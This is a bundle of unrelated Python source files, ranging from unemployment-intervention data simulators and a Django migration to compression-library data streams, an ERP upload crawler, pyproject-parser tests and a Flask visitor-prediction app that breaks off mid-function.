effect_size inc_initial_value_of_treated = ( random.randn(number_of_weeks * number_treat_per_week) * inc_base_std + inc_base_rate ) inc_outcome_value_of_treated = ( inc_initial_value_of_treated + random.randn(number_of_weeks * number_treat_per_week) * inc_treatment_std + inc_treatment_effect ) inc_initial_value_of_control = ( random.randn(number_of_weeks * number_control_per_week) * inc_base_std + inc_base_rate ) inc_outcome_value_of_control = ( random.randn(number_of_weeks * number_control_per_week) * inc_base_std + inc_base_rate ) control_df = pd.DataFrame( { "inc_initial": inc_initial_value_of_control, "inc_outcome": inc_outcome_value_of_control, } ) treated_df = pd.DataFrame( { "inc_initial": inc_initial_value_of_treated, "inc_outcome": inc_outcome_value_of_treated, } ) return treated_df, control_df def gen_employment( number_control_per_week: Union[int, List[int]], effect_size: float, emp_base_rate: float = 0.62, number_of_weeks: int = 13, number_treat_per_week=150, seed: Optional[Union[int, np.random.mtrand.RandomState]] = 189389, ) -> Tuple[pd.DataFrame, pd.DataFrame]: """ Generates employment outcomes after RESEA intervention according to a binomial distribution using `np.random.binomial`. Input for binomial distribution is determined by `effect_size` and `emp_base_rate` variables. Args: number_control_per_week: a single number if control does not vary weekly. List of int otherwise effect_size: used to define the treatment effect, which modifies the mean of generated data emp_base_rate: default reemployment rate assuming no RESEA interventionn. Defaults to 0.62, which was the reemployment rate at Boston for 2018 according to https://oui.doleta.gov/unemploy/uir_rates.asp number_of_weeks: how many cohorts we want to generate. Defaults to 13 because we generate data quarterly number_treat_per_week: number of individuals selected for treatment. Defaults to 150 based on DLT's experiment design seed: seed for randomization Returns: treated_df, control_df """ random = _convert_seed_to_randomstate(seed) # the amount we expect incrased emp_treatment_effect = float(emp_base_rate * (1 + effect_size)) try: emp_outcome_value_of_treated = random.binomial( 1, emp_treatment_effect, size=number_of_weeks * number_treat_per_week ) except ValueError: print(f"error at {emp_treatment_effect}") try: emp_outcome_value_of_control = random.binomial( 1, emp_base_rate, size=number_of_weeks * number_control_per_week, ) except ValueError: print(f"error at {emp_base_rate}") treated_df = pd.DataFrame({"employment": emp_outcome_value_of_treated}) control_df = pd.DataFrame({"employment": emp_outcome_value_of_control}) return treated_df, control_df def gen_pay_ratio( number_control_per_week: Union[int, List[int]], effect_size: float, pay_ratio_lambda=0.5, pay_ratio_min=11.50, distribution: str = "exponential", number_of_weeks: int = 13, number_treat_per_week=150, seed: Optional[Union[int, np.random.mtrand.RandomState]] = 189389, ) -> Tuple[pd.DataFrame, pd.DataFrame]: """ Generates pay ratio outcomes after RESEA intervention according to a distribution. The distribution can be exponential or pareto depending on the user's assumptions about the population of individuals eligible for unemployment. Specifically, the exponential distribution assumes the majority of individuals are making close to minimum wage, while the pareto assumes a heavier tail. As everyone is assumed from an initial pay ratio of 0; we only generate the outcome ratio. Args: number_control_per_week: a single number if control does not vary weekly. List of int otherwise effect_size: used to define the treatment effect, which modifies the mean of generated data pay_ratio_lambda: input for exponential and pareto distribution. pay_ratio_min: minimum wage for RI in 2021 distribution: selection of data generating distribution; either exponential or pareto number_of_weeks: how many cohorts we want to generate. Defaults to 13 because we generate data quarterly. number_treat_per_week: number of individuals selected for treatment. Defaults to 150 based on DLT's experiment design seed: seed for randomization Returns: treated_df, control_df """ random = _convert_seed_to_randomstate(seed) if distribution == "exponential": pay_ratio_outcome_value_of_treated = ( random.exponential( pay_ratio_lambda, number_of_weeks * number_treat_per_week ) * (1 - effect_size) + 1 ) * pay_ratio_min pay_ratio_outcome_value_of_control = ( random.exponential( pay_ratio_lambda, number_of_weeks * number_control_per_week, ) + 1 ) * pay_ratio_min elif distribution == "pareto": pay_ratio_outcome_value_of_treated = ( random.pareto(1 / pay_ratio_lambda, number_of_weeks * number_treat_per_week) + 1 * (1 - effect_size) ) * pay_ratio_min pay_ratio_outcome_value_of_control = ( random.pareto( 1 / pay_ratio_lambda, number_of_weeks * number_control_per_week, ) + 1 ) * pay_ratio_min else: raise ValueError( f"distribution must be one of 'pareto' or 'exponential', not {distribution}" ) treated_df = pd.DataFrame({"pay_ratio": pay_ratio_outcome_value_of_treated}) control_df = pd.DataFrame({"pay_ratio": pay_ratio_outcome_value_of_control}) return treated_df, control_df def gen_weeks_on_unemployment( number_control_per_week: Union[int, List[int]], effect_size: float, qt_unemp_lambda: float = 3, number_of_quarters: int = 6, number_of_weeks: int = 13, number_treat_per_week: int = 150, seed: Optional[Union[int, np.random.mtrand.RandomState]] = 189389, ) -> Tuple[pd.DataFrame, pd.DataFrame]: """ Generates weeks of unemployment after RESEA intervention according to a exponential distribution using `np.random.exponential`. Input for exponential distribution is determined by `qt_unemp_lambda` and `number_of_quarters` variables. Args: number_control_per_week: a single number if control does not vary weekly. List of int otherwise effect_size: used to define the treatment effect, which modifies the mean of generated data qt_unemp_lambda: expected frequency of weeks on unemployment for quarter. source: https://www.bls.gov/web/empsit/cpseea12.htm number_of_quarters: The number of quarters. Defaults to 6 to adjust the lambda rate for the 1.5 year study period. number_of_weeks: how many cohorts we want to generate. Defaults to 13 because we generate data quarterly. number_treat_per_week: number of individuals selected for treatment. Defaults to 150 based on DLT's experiment design seed: seed for randomization Returns: treated_df, control_df """ random = _convert_seed_to_randomstate(seed) # attempt to estimate this as exponential distribution, # because the event can be modeled as the time between occurrances unemp_lambda = qt_unemp_lambda * number_of_quarters unemp_treatment_effect = unemp_lambda * (1 - effect_size) unemp_outcome_value_of_treat = random.exponential( unemp_treatment_effect, size=number_of_weeks * number_treat_per_week ) unemp_outcome_value_of_control = random.exponential( unemp_lambda, size=number_of_weeks * number_control_per_week ) treated_df = pd.DataFrame({"wks_unemp": unemp_outcome_value_of_treat}) control_df = pd.DataFrame({"wks_unemp": unemp_outcome_value_of_control}) return treated_df, control_df def gen_cohorts( df: pd.DataFrame, cohort_unit: int, is_treated: bool = True, ) -> pd.DataFrame: """ N.B. alters df in place and also returns it """ if is_treated: df["cohort"] = np.arange(len(df), dtype=int) // cohort_unit df["is_treated"] = True else: df["cohort"] = np.arange(len(df), dtype=int) // cohort_unit df["is_treated"] = False ### Alternatively, this is where we implement the reduction if we want weekly variation return df users/migrations/0003_customuser_bibgroup.py # Generated by Django 3.0.4 on 2020-04-01 15:46 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('search', '0004_authors_journals_results'), ('users', '0002_remove_customuser_bibgroup'), ] operations = [ migrations.AddField( model_name='customuser', name='bibgroup', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='search.Bibgroup'), ), ] from turtle import Turtle import random STARTING_MOVE_DISTANCE = 5 MOVE_INCREMENT = 10 colors = ['blue', 'green', 'yellow', 'red', 'orange', 'cyan', 'magenta', 'purple', 'black'] class Car: def __init__(self): self.all_cars = [] self.car_speed = STARTING_MOVE_DISTANCE def create_cars(self): random_chance = random.randint(1,6) if random_chance == 1: new_car = Turtle() new_car.shape('circle') new_car.color(random.choice(colors)) new_car.penup() new_car.goto(280, random.randint(-250, 250)) new_car.speed(MOVE_INCREMENT) self.all_cars.append(new_car) def moving(self): for car in self.all_cars: car.backward(self.car_speed) def level_up(self): self.car_speed += MOVE_INCREMENT import jinja2 import json import yaml from pydantic.json import pydantic_encoder from .config import settings from . import models, utils def toyaml(obj): """ Filter for converting an object to YAML that is able to handle Pydantic models. """ # In order to benefit from the Pydantic encoder we need to go via JSON obj_json = json.dumps(obj, default = pydantic_encoder) return yaml.safe_dump(json.loads(obj_json)) class Loader: """ Class for returning objects created by rendering YAML templates from this package. """ def __init__(self, **globals): # Create the package loader for the parent module of this one loader = jinja2.PackageLoader(self.__module__.rsplit(".", maxsplit = 1)[0]) self.env = jinja2.Environment(loader = loader, autoescape = False) self.env.globals.update(globals) self.env.filters.update( mergeconcat = utils.mergeconcat, fromyaml = yaml.safe_load, toyaml = toyaml ) def loads(self, template, **params): """ Render the specified template with the given params and return the result as a string. """ return self.env.get_template(template).render(**params) def load(self, template, **params): """ Render the specified template with the given params, load the result as a YAML document and return the resulting object. """ return yaml.safe_load(self.loads(template, **params)) default_loader = Loader(settings = settings, models = models) abel-bernabeu/facecompressor1-10 import argparse import autoencoder def addTrainablesArg(parser): parser.add_argument('--model', dest='model', help='Trained model', default='model.pt') def addExchangeArg(parser): parser.add_argument('--exchange', dest='exchange', help='File with exchanged data', required=True) parser = argparse.ArgumentParser() subparsers = parser.add_subparsers(dest="action") encode_parser = subparsers.add_parser('encode') addTrainablesArg(encode_parser) encode_parser.add_argument('--input', dest='input', help='Input image file name', required=True) addExchangeArg(encode_parser) decode_parser = subparsers.add_parser('decode') addTrainablesArg(decode_parser) addExchangeArg(decode_parser) decode_parser.add_argument('--output', dest='output', help='Output image file name', required=True) opts = parser.parse_args() if opts.action == 'encode': autoencoder.encode(opts.model, opts.input, opts.exchange) elif opts.action == 'decode': autoencoder.decode(opts.model, opts.exchange, opts.output) import sys input = sys.stdin.readline j = int(input()) p = int(input()) s = [] m = [] l = [] sReq = [] mReq = [] lReq = [] for i in range(j): temp = input() if temp == 'L\n': l.append(i + 1) elif temp == 'M\n': m.append(i + 1) else: s.append(i + 1) for i in range(p): size, num = input().split() num = int(num) if size == 'L': lReq.append(num) elif size == 'M': mReq.append(num) else: sReq.append(num) def myfunc(jerseys, req): leftReq = set(req) intersect = [] leftJersey = [] for v in jerseys: if v in leftReq: intersect.append(v) leftReq.remove(v) else: leftJersey.append(v) return intersect, leftJersey, list(leftReq) lJerseys, lrgLeft, discard = myfunc(l, lReq) mJerseys, medLeft, mReqLeft = myfunc(m, mReq) sJerseys, disc, sReqLeft = myfunc(s, sReq) t1, t2, t3 = myfunc(medLeft, sReqLeft) mJerseys += t1 mReqLeft += t3 t1, t2, t3 = myfunc(lrgLeft, mReqLeft) lJerseys += t1 print(len(lJerseys + mJerseys + sJerseys))import random import torch import numpy as np class ReplayBuffer(object): def __init__(self, max_length=50000): self.max_length = max_length self.buffer = [] def append(self, state, action, reward, state_next, term): self.buffer.append((state.clone(), action.detach().clone(), reward, state_next.clone(), term)) if len(self.buffer)>self.max_length: self.buffer.pop(0) def sample(self, batch_size): state, action, reward, state_next, term = zip(*random.choices(self.buffer, k=batch_size)) state = torch.stack(state, dim=0) state_next = torch.stack(state_next, dim=0) action = torch.stack(action, dim=0) reward = torch.tensor(reward, device=state.device, dtype=state.dtype) term = torch.tensor(term, dtype=state.dtype, device=state.device) return state, action, reward, state_next, term def get_histograms(self): state, action, reward, state_next, term = self.sample(1000) ah = np.histogram(action.cpu().numpy(), bins=60) rh = np.histogram(reward.cpu().numpy(), bins=60) trh = np.histogram(np.linalg.norm((state_next - state).cpu().numpy(), axis=1)) return ah, rh, trh def __len__(self): return len(self.buffer)#Write a script that detects and prints out your monitor resolution from screeninfo import get_monitors print(get_monitors()) width=get_monitors()[0].width height=get_monitors()[0].height print("Width: %s, Height: %s" % (width, height)) recipes/graphthewy/all/conanfile.py import os from conans import ConanFile, tools from conans.errors import ConanInvalidConfiguration class GraphthewyConan(ConanFile): name = "graphthewy" license = "EUPL-1.2" homepage = "https://github.com/alex-87/graphthewy" url = "https://github.com/conan-io/conan-center-index" description = "Simple header-only C++ Library for graph modelling (directed or not) and graph cycle detection. " topics = ("graph", "algorithm", "modelling", "header-only") settings = "compiler" no_copy_source = True def source(self): tools.get(**self.conan_data["sources"][self.version]) os.rename(self.name + "-" + self.version, self._source_subfolder) @property def _compilers_minimum_version(self): return { "Visual Studio": "15.7", "gcc": "7", "clang": "7", "apple-clang": "10" } @property def _source_subfolder(self): return "source_subfolder" def configure(self): if self.settings.compiler.cppstd: tools.check_min_cppstd(self, 17) def lazy_lt_semver(v1, v2): lv1 = [int(v) for v in v1.split(".")] lv2 = [int(v) for v in v2.split(".")] min_length = min(len(lv1), len(lv2)) return lv1[:min_length] < lv2[:min_length] minimum_version = self._compilers_minimum_version.get(str(self.settings.compiler), False) if not minimum_version: self.output.warn("graphthewy requires C++17. Your compiler is unknown. Assuming it supports C++17.") elif lazy_lt_semver(str(self.settings.compiler.version), minimum_version): raise ConanInvalidConfiguration("graphthewy requires C++17, which your compiler does not support.") def package(self): self.copy("LICENSE", dst="licenses", src=self._source_subfolder) self.copy("*.hpp", dst=os.path.join("include", "graphthewy"), src=self._source_subfolder, keep_path=False) def package_id(self): self.info.header_only() from .base import BaseSerializer # noqa from .json import JSONSerializer # noqa from .pickle import PickleSerializer # noqa kedartatwawadi/stanford_compression_library import abc import tempfile import os import typing from core.data_block import DataBlock Symbol = typing.Any class DataStream(abc.ABC): """abstract class to represent a Data Stream The DataStream facilitates the block interface. From the interface standpoint, the two functions which are useful are: - get_block(block_size) -> returns a DataBlock of the given block_size from the stream - write_block(block) -> writes the block of data to the stream The DataStream can act as a stream object for both writing and reading blocks The two more useful sub-classes of the abstract class are FileDataStream and ListDataStream. (see their description for more details) """ @abc.abstractmethod def seek(self, pos: int): """seek a particular position in the data stream""" pass @abc.abstractmethod def get_symbol(self): """returns a symbol from the data stream, returns None if the stream is finished This is an abstract method, and hence needs to be implemented by the subclasses """ pass def get_block(self, block_size: int) -> DataBlock: """returns a block of data (of the given max size) from the stream get_block function tries to return a block of size `block_size`. In case the remaining stream is shorter, a smaller block will be returned Args: block_size (int): the (max) size of the block of data to be returned. Returns: DataBlock: """ # NOTE: we implement get_block as a loop over get_symbol function # this is not the most optimal way of imeplemting get_block (as reading a block of data at once might be faster) # TODO: investigate faster ways of directly reading a block data_list = [] for _ in range(block_size): # get next symbol s = self.get_symbol() if s is None: break data_list.append(s) # if data_list is empty, return None to signal the stream is over if not data_list: return None return DataBlock(data_list) @abc.abstractmethod def write_symbol(self, s): """writes the given symbol to the stream The symbol can be appropriately converted to a particular format before writing. This is an abstract method and so, the subclass will have to implement it Args: s (Any): symbol to be written to the stream """ pass def write_block(self, data_block: DataBlock): """write the input block to the stream Args: data_block (DataBlock): block to be written to the stream """ # NOTE: we implement write_block as a loop over write_symbol function # this is not the most optimal way of imeplemting write_block (as writing a block of data at once might be faster) # TODO: investigate faster ways of directly writing a block for s in data_block.data_list: self.write_symbol(s) def __enter__(self): """function executed while opening the context See: https://realpython.com/python-with-statement/. More details in FileDataStream.__enter__ docstring """ return self def __exit__(self, exc_type, exc_value, exc_traceback): """Function executed which exiting the context Note that the arguments exc_type, exc_value, exc_traceback are as required by python for a context """ pass class ListDataStream(DataStream): """ ListDataStream is a wrapper around a list of symbols. It is useful to: - extract data from the list block by block - write data to the list block by block In practice, this class might be used mainly for testing (as usually you would read data from a file.. see FileDataStream for that) """ def __init__(self, input_list: typing.List): """initialize with input_list and reset the stream Args: input_list (List): the list of symbols, around which the class is a wrapper Usage: with ListDataStream(input_list) as ds: block = ds.get_block(block_size=5) # do something with the block """ # assert whether the input_list is indeed a list assert isinstance(input_list, list) self.input_list = input_list # set the position counter self.current_ind = 0 def seek(self, pos: int): """set the current_ind to a particular pos""" assert pos <= len(self.input_list) self.current_ind = pos def get_symbol(self) -> Symbol: """returns the next symbol from the self.input_list""" # retrieve the next symbol if self.current_ind >= len(self.input_list): return None s = self.input_list[self.current_ind] # increment the current_ind counter self.current_ind += 1 return s def write_symbol(self, s: Symbol): """write a symbol to the stream""" assert self.current_ind <= len(self.input_list) # the case where we modify a symbol if self.current_ind < len(self.input_list): self.input_list[self.current_ind] = s else: # case where we append a symbol self.input_list.append(s) class FileDataStream(DataStream): """Abstract class to create a data stream from a File The FileDataStream defines __exit__, __enter__ methods on top of DataStream. These methods handle file obj opening/closing Subclasses (eg: TextDataStream) need to imeplement methods get_symbol, write_symbol to get a functional object. """ def __init__(self, file_path: str, permissions="r"): """Initialize the FileDataStream object Args: file_path (str): path of the file to read from/write to permissions (str, optional): Permissions to open the file obj. Use "r" to read, "w" to write to (other pyhton file obj permissions also can be used). Defaults to "r". """ self.file_path = file_path self.permissions = permissions def __enter__(self): """open the file object context based on the permissions specified NOTE: One way of cleanly managing resources in python is using the with statement as shown in the example below. This ensures the resource is released when exiting the context. One way to support allow using with statement is defining __enter__ and __exit__ statements, which allow for executing functions while entering or exiting the context. Reference: https://realpython.com/python-with-statement/ Example: with TextFileDataStream(path, "w") as fds: # get a text block block = fds.get_block(5) """ self.file_obj = open(self.file_path, self.permissions) return self def __exit__(self, exc_type, exc_value, exc_traceback): """close the file object at the end of context please take a look __enter__ docstring for more info. Reference: https://realpython.com/python-with-statement/ """ self.file_obj.close() def seek(self, pos: int): """resets the file object to the beginning""" self.file_obj.seek(pos) class TextFileDataStream(FileDataStream): """FileDataStream to read/write text data""" def get_symbol(self): """get the next character from the text file as we read character data from file by default, the get_symbol function does not need to do anything special conversions Returns: (str, None): the next character, None if we reached the end of stream """ s = self.file_obj.read(1) if not s: return None return s def write_symbol(self, s): """write a character to the text file""" self.file_obj.write(s) class Uint8FileDataStream(FileDataStream): """reads Uint8 numbers written to a file FIXME: need to immplement """ pass ################################# def test_list_data_stream(): """simple testing function to check if list data stream is getting generated correctly""" input_list = list(range(10)) with ListDataStream(input_list) as ds: for i in range(3): block = ds.get_block(block_size=3) assert block.size == 3 block = ds.get_block(block_size=2) assert block.size == 1 block = ds.get_block(block_size=2) assert block is None # try seeking and reading ds.seek(7) block = ds.get_block(block_size=5) assert block.size == 3 assert block.data_list[0] == 7 # try seeking and writing ds.seek(5) ds.write_symbol(-1) block = ds.get_block(block_size=5) assert block.size == 5 assert block.data_list[0] == -1 def test_file_data_stream(): """function to test file data stream""" # create a temporary file with tempfile.TemporaryDirectory() as tmpdirname: temp_file_path = os.path.join(tmpdirname, "tmp_file.txt") # write data to the file data_gt = DataBlock(list("This-is_a_test_file")) with TextFileDataStream(temp_file_path, "w") as fds: fds.write_block(data_gt) # try seeking to correct symbol at pos 4 fds.seek(4) fds.write_symbol("_") # read data from the file with TextFileDataStream(temp_file_path, "r") as fds: block = fds.get_block(block_size=4) assert block.size == 4 # try seeking and reading fds.seek(4) block = fds.get_block(block_size=4) assert block.data_list[0] == "_" lino_book/projects/lydia/tests/dumps/18.12.0/ledger_accountingperiod.py # -*- coding: UTF-8 -*- logger.info("Loading 6 objects to table ledger_accountingperiod...") # fields: id, ref, start_date, end_date, state, year, remark loader.save(create_ledger_accountingperiod(1,u'2015-01',date(2015,1,1),date(2015,1,31),'10',1,u'')) loader.save(create_ledger_accountingperiod(2,u'2015-02',date(2015,2,1),date(2015,2,28),'10',1,u'')) loader.save(create_ledger_accountingperiod(3,u'2015-03',date(2015,3,1),date(2015,3,31),'10',1,u'')) loader.save(create_ledger_accountingperiod(4,u'2015-04',date(2015,4,1),date(2015,4,30),'10',1,u'')) loader.save(create_ledger_accountingperiod(5,u'2015-05',date(2015,5,1),date(2015,5,31),'10',1,u'')) loader.save(create_ledger_accountingperiod(6,u'2015-12',date(2015,12,1),date(2015,12,31),'10',1,u'')) loader.flush_deferred_objects() projects/hupun_operator/page/purchase/upload_purchase.py import copy import uuid from pyspider.libs.base_crawl import * from alarm.page.ding_talk import DingTalk from urllib import parse from pyspider.helper.excel import Excel from cookie.model.data import Data as CookieData from hupun_operator.page.common_post import CommonPost from hupun_operator.page.common_get import CommonGet from hupun_operator.page.download_excel_detect import DownloadExcelDetect class UploadPurchase(BaseCrawl): """ 上传商品数据到erp 的采购订单 """ PATH = '/dorado/uploader/fileupload' # 文件名 upload_name = '采购快速导入文件.xls' # 这个是上传表格的时候用到的(好像必须是这个ID,要不然会报错) CM = 'D1E338D6015630E3AFF2440F3CBBAFAD' def __init__(self, data, storage_uid, storage_name): super(UploadPurchase, self).__init__() self.__data = copy.deepcopy(data) self.__storage_name = storage_name self.__storage_uid = storage_uid def crawl_builder(self): excel = self.get_excel() # TODO 商品数据的组装改成真实的数据 for _d in self.__data.get('list'): excel.add_data(self.value_to_erp(_d)) return CrawlBuilder() \ .set_url('{}{}'.format(config.get('hupun', 'service_host'), self.PATH)) \ .set_upload_files_kv('file', ('file.xlsx', excel.execute())) \ .set_task_id(md5string(uuid.uuid4())) \ .set_cookies(CookieData.get(CookieData.CONST_PLATFORM_HUPUN, CookieData.CONST_USER_HUPUN[0][0])) \ .set_post_data_kv('storageUid', self.__storage_uid) \ .set_post_data_kv('storageName', self.__storage_name) \ .set_post_data_kv('name', self.upload_name) \ .set_post_data_kv('exec', 'importBillB') \ .set_post_data_kv('cm', self.CM) \ .set_post_data_kv('op', 'op') \ .set_post_data_kv('sn', 'sn') \ .set_post_data_kv('tk', 'tk') \ .set_post_data_kv('checkType', 'all') \ .set_post_data_kv('remark', self.__data.get('list')[0].get('remark')) \ .set_post_data_kv('_fileResolver', 'uploadInterceptor#process') \ .set_kwargs_kv('validate_cert', False) def parse_response(self, response, task): result = parse.unquote(response.text).strip('"').split('|') status = 0 print(result) # 如果有html类型的错误地址,说明整个表格导入都失败了 if result[2]: doc = CommonGet(result[2]).get_result() status = 1 error_msg = doc.replace(' ', '').replace('\n', '') msg = error_msg print('导入错误: ', msg) else: # 获取当前数据导入的结果(导入结果只能是导入成功后,通过这个查询接口拿) import_result = CommonPost(CommonPost.IMPORT_PURCHASE_RESULT).get_result() bill_code = import_result.get('data')[0].get('billCode') print('导入结果: ', import_result) print('导入结果的 bill_code: ', bill_code) # 获取当前数据导入的错误excel的key import_err_k = CommonPost(CommonPost.IMPORT_PURCHASE_ERROR_K).get_result() print('错误excel的key: ', import_err_k) # 根据错误excel的key下载excel err_result = DownloadExcelDetect(import_err_k['data']['msg']).get_result() error_msg = err_result[0].get('error', '') if err_result else '' print('错误数据: ', err_result) print('错误数据error_msg: ', error_msg) # 返回错误数据 if error_msg: status = 1 msg = error_msg + ';bill:{}'.format(bill_code) else: msg = import_result return status, msg def value_to_erp(self, data): """ 把数据转为erp上传的对应字段 :param data: :return: """ the_list = { 'sku': data.get('skuBarcode', ''), # 'goods_name': data.get('goods_name', ''), 'count': data.get('purchaseCount', ''), 'price': data.get('price', ''), 'supplier': data.get('supplierName', ''), 'arrivalDate': data.get('arrivalDate', ''), } return the_list def get_excel(self): """ 定义表头及字段名 :return: """ return Excel() \ .add_header('sku', '商品编码') \ .add_header('sku', '商品条码') \ .add_header('goods_name', '商品名称') \ .add_header('NONE', '规格名称') \ .add_header('count', '<必填>采购数量') \ .add_header('NONE', '单位') \ .add_header('price', '<必填>单价') \ .add_header('NONE', '折扣率(%)') \ .add_header('cycle', '采购周期') \ .add_header('arrivalDate', '到货日期') \ .add_header('NONE', '商品备注') \ .add_header('supplier', '供应商') \ .add_header('salesman', '业务员账号') \ .add_header('NONE', '结算方式') start_message = """Added this *chat_id* to list of getters ip change info. For more commands use /help""" help_message = """All available commands: - /help - get help. - /start - start command, adds chat_id to list of getters ip change info - /getip - gets current ip - /getconfig - gets config [in progress] """ def send_ip(ip): return "Ip is " + ip def send_ip_change(ip): return "Ip changed. New is: " + ip def send_config(json): return """Config in JSON format: ``` """ + json + """```""" # 3rd party import pytest from coincidence.regressions import AdvancedFileRegressionFixture from domdf_python_tools.paths import PathPlus from pyproject_examples.example_configs import COMPLETE_A, COMPLETE_A_WITH_FILES, COMPLETE_B, COMPLETE_PROJECT_A # this package from pyproject_parser import PyProject UNORDERED = """\ [project] keywords = [ "pep517", "pep621", "build", "sdist", "wheel", "packaging", "distribution",] version = "2021.0.0" description = "A simple Python wheel builder for simple projects." dynamic = [ "classifiers", "requires-python",] dependencies = [ "httpx", "gidgethub[httpx]>4.0.0", "django>2.1; os_name != 'nt'", "django>2.0; os_name == 'nt'" ] name = "whey" [build-system] requires = [ "whey",] build-backend = "whey" [project.urls] Homepage = "https://whey.readthedocs.io/en/latest" Documentation = "https://whey.readthedocs.io/en/latest" "Issue Tracker" = "https://github.com/repo-helper/whey/issues" "Source Code" = "https://github.com/repo-helper/whey" [tool.whey] base-classifiers = [ "Development Status :: 4 - Beta",] python-versions = [ "3.6", "3.7", "3.8", "3.9", "3.10",] python-implementations = [ "CPython", "PyPy",] platforms = [ "Windows", "macOS", "Linux",] license-key = "MIT" [[project.authors]] email = "" name = "" """ DUMPS_README_TEMPLATE = """\ [build-system] requires = [ "whey",] build-backend = "whey" [project] name = "Whey" version = "2021.0.0" description = "A simple Python wheel builder for simple projects." keywords = [ "pep517", "pep621", "build", "sdist", "wheel", "packaging", "distribution",] dynamic = [ "classifiers", "requires-python",] dependencies = [ "httpx", "gidgethub[httpx]>4.0.0", "django>2.1; os_name != 'nt'", "django>2.0; os_name == 'nt'" ] {readme_block} [[project.authors]] email = "" name = "" [project.urls] Homepage = "https://whey.readthedocs.io/en/latest" Documentation = "https://whey.readthedocs.io/en/latest" "Issue Tracker" = "https://github.com/repo-helper/whey/issues" "Source Code" = "https://github.com/repo-helper/whey" """ COMPLETE_UNDERSCORE_NAME = """\ [build-system] requires = [ "whey",] build-backend = "whey" [project] name = "toctree_plus" version = "2021.0.0" description = "A simple Python wheel builder for simple projects." keywords = [ "pep517", "pep621", "build", "sdist", "wheel", "packaging", "distribution",] dynamic = [ "classifiers", "requires-python",] dependencies = [ "httpx", "gidgethub[httpx]>4.0.0", "django>2.1; os_name != 'nt'", "django>2.0; os_name == 'nt'" ] [[project.authors]] email = "" name = "" [project.urls] Homepage = "https://whey.readthedocs.io/en/latest" Documentation = "https://whey.readthedocs.io/en/latest" "Issue Tracker" = "https://github.com/repo-helper/whey/issues" "Source Code" = "https://github.com/repo-helper/whey" [tool.whey] base-classifiers = [ "Development Status :: 4 - Beta",] python-versions = [ "3.6", "3.7", "3.8", "3.9", "3.10",] python-implementations = [ "CPython", "PyPy",] platforms = [ "Windows", "macOS", "Linux",] license-key = "MIT" package = "whey" """ @pytest.mark.parametrize( "toml_string", [ pytest.param(COMPLETE_A, id="COMPLETE_A"), pytest.param(COMPLETE_B, id="COMPLETE_B"), pytest.param(COMPLETE_PROJECT_A, id="COMPLETE_PROJECT_A"), ] ) def test_dumps( tmp_pathplus: PathPlus, toml_string: str, advanced_file_regression: AdvancedFileRegressionFixture, ): (tmp_pathplus / "pyproject.toml").write_clean(toml_string) config = PyProject.load(filename=tmp_pathplus / "pyproject.toml") config.dump(tmp_pathplus / "pyproject.toml") advanced_file_regression.check_file(tmp_pathplus / "pyproject.toml") advanced_file_regression.check(config.dumps(), extension=".toml") def _param(readme_block: str, **kwargs): return pytest.param(DUMPS_README_TEMPLATE.format(readme_block=readme_block), **kwargs) @pytest.mark.parametrize( "toml_string", [ _param(readme_block="readme = 'README.rst'", id="string"), _param( readme_block="[project.readme]\ntext = 'This is the README'\ncontent-type = 'text/x-rst'", id="dict_text" ), _param( readme_block="[project.readme]\nfile = 'README.rst'\ncontent-type = 'text/x-rst'", id="dict_file" ), ] ) def test_dumps_readme( tmp_pathplus: PathPlus, toml_string: str, advanced_file_regression: AdvancedFileRegressionFixture, ): (tmp_pathplus / "pyproject.toml").write_clean(toml_string) (tmp_pathplus / "README.rst").write_clean("This is the README") config = PyProject.load(filename=tmp_pathplus / "pyproject.toml") config.dump(tmp_pathplus / "pyproject.toml") advanced_file_regression.check_file(tmp_pathplus / "pyproject.toml") advanced_file_regression.check(config.dumps(), extension=".toml") @pytest.mark.parametrize( "toml_string", [ pytest.param(COMPLETE_A, id="COMPLETE_A"), pytest.param(COMPLETE_A_WITH_FILES, id="COMPLETE_A_WITH_FILES"), pytest.param(COMPLETE_B, id="COMPLETE_B"), pytest.param(COMPLETE_PROJECT_A, id="COMPLETE_PROJECT_A"), pytest.param(UNORDERED, id="UNORDERED"), pytest.param(COMPLETE_UNDERSCORE_NAME, id="COMPLETE_UNDERSCORE_NAME"), ] ) def test_reformat( tmp_pathplus: PathPlus, toml_string: str, advanced_file_regression: AdvancedFileRegressionFixture, ): (tmp_pathplus / "pyproject.toml").write_clean(toml_string) (tmp_pathplus / "README.rst").write_clean("This is the README") (tmp_pathplus / "LICENSE").write_clean("This is the LICENSE") PyProject.reformat(tmp_pathplus / "pyproject.toml") advanced_file_regression.check_file(tmp_pathplus / "pyproject.toml") # Should be no changes PyProject.reformat(tmp_pathplus / "pyproject.toml") advanced_file_regression.check_file(tmp_pathplus / "pyproject.toml") # Python - 3.6.0 include = lambda arr, item: item in arr import re a = "> (1)()" b = re.compile(r"> \((\d+)\)\(([\w|\W]*)\)") c = b.match(a) d, f = c.groups() print(d, f) a = 'pid 17240\r\n' b = re.compile(r"pid (\d+)\r\n") c = b.match(a) print(c.groups())import pandas as pd from sklearn.preprocessing import LabelEncoder from flask import Flask, request, render_template app = Flask(__name__) @app.route("/") def index(): dataset = pd.read_csv('Purpose-of-Visit-by-Port-and-Country-JTB-Open-data-request.csv') dataset.drop('Number of Visitors', inplace=True, axis=1) dataset = dataset.dropna() le = LabelEncoder() le.fit(dataset.loc[:, ('Port of Entry')]) dataset.loc[:, ('Port of Entry')] = le.transform(dataset.loc[:, ('Port of Entry')]) portEntry = dataset['Port of Entry'].unique() portEntryName = le.inverse_transform(portEntry) zipbObj = zip(portEntryName, portEntry) portEntryDict = dict(zipbObj) le.fit(dataset.loc[:, ('Type of Visit')]) dataset.loc[:, ('Type of Visit')] = le.transform(dataset.loc[:, ('Type of Visit')]) visitType = dataset['Type of Visit'].unique() visitTypeName = le.inverse_transform(visitType) zipbObj = zip(visitTypeName, visitType) visitTypeDict = dict(zipbObj) le.fit(dataset.loc[:, ('Origin')]) dataset.loc[:, ('Origin')] = le.transform(dataset.loc[:, ('Origin')]) origin = dataset['Origin'].unique() originName = le.inverse_transform(origin) zipbObj = zip(originName, origin) originDict = dict(zipbObj) le.fit(dataset.loc[:, ('Month')]) dataset.loc[:, ('Month')] = le.transform(dataset.loc[:, ('Month')]) month = dataset['Month'].unique() monthName = le.inverse_transform(month) zipbObj = zip(monthName, month) monthDict = dict(zipbObj) return render_template('index.html', dict1 = portEntryDict, dict2 = visitTypeDict, dict3 = originDict, dict4 = monthDict) @app.route("/predictedVisitor", methods=['POST']) def predict(): from joblib import load with 